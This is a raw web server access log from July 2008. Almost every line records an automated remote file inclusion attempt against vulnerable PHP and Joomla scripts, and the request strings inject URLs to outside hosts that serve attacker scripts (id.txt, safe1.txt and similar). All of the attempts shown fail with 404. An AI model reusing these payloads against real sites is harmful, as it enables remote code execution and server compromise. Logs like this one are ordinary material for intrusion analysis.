200.29.4.54 - - [06/Jul/2008:18:59:08 -0700] "GET /logs/access_080211.log//mcf.php?content=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.29.4.54 - - [06/Jul/2008:18:59:15 -0700] "GET //mcf.php?content=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.77.11.177 - - [06/Jul/2008:18:59:32 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
82.77.11.177 - - [06/Jul/2008:18:59:34 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
82.77.11.177 - - [06/Jul/2008:18:59:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:19:00:24 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:19:00:24 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:19:00:30 -0700] "GET //include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:19:00:30 -0700] "GET //include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:19:00:35 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.158.0.5 - - [06/Jul/2008:19:00:35 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:02:40 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:02:40 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:02:41 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
116.125.113.115 - - [06/Jul/2008:19:04:08 -0700] "GET /logs//main.php?sayfa=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "neighborhoodglimpses.com"
116.125.113.115 - - [06/Jul/2008:19:04:08 -0700] "GET //main.php?sayfa=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "neighborhoodglimpses.com"
77.232.68.17 - - [06/Jul/2008:19:06:02 -0700] "GET /logs/access_071105.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
65.98.8.4 - - [06/Jul/2008:19:06:21 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
203.146.170.160 - - [06/Jul/2008:19:06:59 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.146.170.160 - - [06/Jul/2008:19:07:08 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
203.146.170.160 - - [06/Jul/2008:19:07:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.76.111.11 - - [06/Jul/2008:19:08:06 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:19:11:27 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:19:11:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:19:11:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:19:13:18 -0700] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:19:13:20 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.28.86.50 - - [06/Jul/2008:19:13:25 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:13:58 -0700] "GET /logs/access_071105.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:14:53 -0700] "GET /logs/access_071105.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:14:54 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:15:06 -0700] "GET /logs/access_080211.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:15:06 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
69.94.56.40 - - [06/Jul/2008:19:15:19 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:19:15:34 -0700] "GET /logs/access_080211.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:19:15:34 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:19:15:34 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:15:49 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:16:12 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:16:16 -0700] "GET /logs/access_071105.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:16:17 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:16:17 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:16:28 -0700] "GET /logs/access_080211.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:16:29 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.66.101 - - [06/Jul/2008:19:16:29 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.186.1.54 - - [06/Jul/2008:19:17:09 -0700] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
89.186.1.54 - - [06/Jul/2008:19:17:10 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
89.186.1.54 - - [06/Jul/2008:19:17:10 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
89.186.1.54 - - [06/Jul/2008:19:17:33 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
89.186.1.54 - - [06/Jul/2008:19:17:34 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
89.186.1.54 - - [06/Jul/2008:19:17:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
67.177.4.235 - - [06/Jul/2008:19:20:26 -0700] "GET /logs/access_080107.log//include/write.php?dir=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.177.4.235 - - [06/Jul/2008:19:20:27 -0700] "GET //include/write.php?dir=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.177.4.235 - - [06/Jul/2008:19:20:30 -0700] "GET /logs//include/write.php?dir=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.19.130.218 - - [06/Jul/2008:19:25:34 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
67.19.130.218 - - [06/Jul/2008:19:25:34 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:19:27:23 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:19:27:25 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:19:31:25 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:19:31:25 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:19:35:03 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:19:35:03 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:19:44:02 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:19:44:02 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:19:44:02 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:19:46:37 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:19:46:38 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:19:46:38 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:19:47:18 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:19:47:18 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:19:47:37 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.203.245.7 - - [06/Jul/2008:19:50:07 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
125.245.146.189 - - [06/Jul/2008:19:52:41 -0700] "GET /lostpasswd.php?env[include_prefix]=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
65.55.211.150 - - [06/Jul/2008:19:53:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
65.55.211.150 - - [06/Jul/2008:19:53:02 -0700] "GET /logs/access_080609.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:19:53:14 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:19:53:14 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:19:53:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:53:42 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:19:56:06 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
82.77.11.177 - - [06/Jul/2008:19:57:15 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:57:20 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:57:20 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:57:20 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:19:57:30 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
206.71.148.152 - - [06/Jul/2008:19:57:39 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:58:48 -0700] "GET /logs/access_080211.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:58:48 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:58:48 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:59:23 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:59:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:19:59:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:19:59:41 -0700] "GET /logs/access.log/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:19:59:41 -0700] "GET /logs/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:19:59:41 -0700] "GET /main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:00:08 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:00:09 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:00:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:20:01:14 -0700] "GET /logs/access_080211.log//init_basic.php?GALLERY_BASEDIR=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:20:01:14 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
200.20.120.10 - - [06/Jul/2008:20:01:14 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:01:22 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
